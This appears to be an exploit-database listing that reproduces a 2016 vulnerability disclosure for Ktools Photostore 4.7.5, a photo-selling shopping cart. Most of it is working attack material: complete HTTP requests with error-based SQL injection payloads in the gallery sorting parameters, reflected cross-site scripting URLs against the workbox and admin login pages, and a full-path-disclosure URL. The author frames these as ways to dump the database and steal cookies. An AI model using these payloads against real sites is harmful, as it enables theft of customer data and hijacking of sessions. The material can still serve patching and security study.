Lucene search

K
zdtYakir Wizman1337DAY-ID-25156
HistoryJul 04, 2016 - 12:00 a.m.

Ktools Photostore 4.7.5 - Multiple Vulnerabilities

2016-07-0400:00:00
Yakir Wizman
0day.today
193
ktools photostore
multiple vulnerabilities
sql injection
cross site scripting
professional photo gallery
shopping cart software
credit cards
paypal
2checkout
cookie stealing

Exploit for php platform in category web applications

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
# Bug discovered by Yakir Wizman
# Date 01/07/2016
# Affected versions prior to 4.7.5
# Vendor Homepage - http://www.ktools.net
 
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#       Author will be not responsible for any damage.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# About the Application:
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow:
#
#   Sell various sizes or formats of the same photo.
#   Sell photos, vector art, zip files and more.
#   Sell videos PhotoStore Pro Only
#   Sell prints, artwork, products, packages, digital collections and more.
#   Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
#   Email notifications to both you and the customer upon purchase.
#   Customers can instantly download after payment.
#   Customers can instantly download their files after payment.
#   Connects to PayPal and 2Checkout.
#   Built in credit system to allow your customers to buy credits.
#   Allow your members to upload and sell their photos and other media while you take a commission.
  
# The vulnerabilities which are described bellow does not require any legitimate user to exploit them.
# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them.
# A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability).
 
 
 
# SQL Injection (error based) Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# SQL Injection (Severity is Critical)
# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query.
# Request Data #1 is:
 
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: www.ktoolsdemos.net
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
 
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
 
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 
###
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
###
# The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query.
# Request Data #2 is:
 
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://server/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: server
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
 
postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
 
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
 
 
 
# Cross Site Scripting Proof—Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# XSS (Severity is Medium)
# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application
#
# In Order to exploit this vulnerability, the URL should be like the following examples:
#
# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“><script>alert(/XSS/)</script>
# http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden
 
 
# Full path disclosure Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# FPD (Severity is low/info)
# The vulnerable parameter is “photoID” in “productshot.php” file which is partially sanitized and therefor an attacker could exploit this only to full path disclosure.
#
# In order to exploit this vulnerability, the url should be like the following example:
#
# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125

#  0day.today [2018-04-04]  #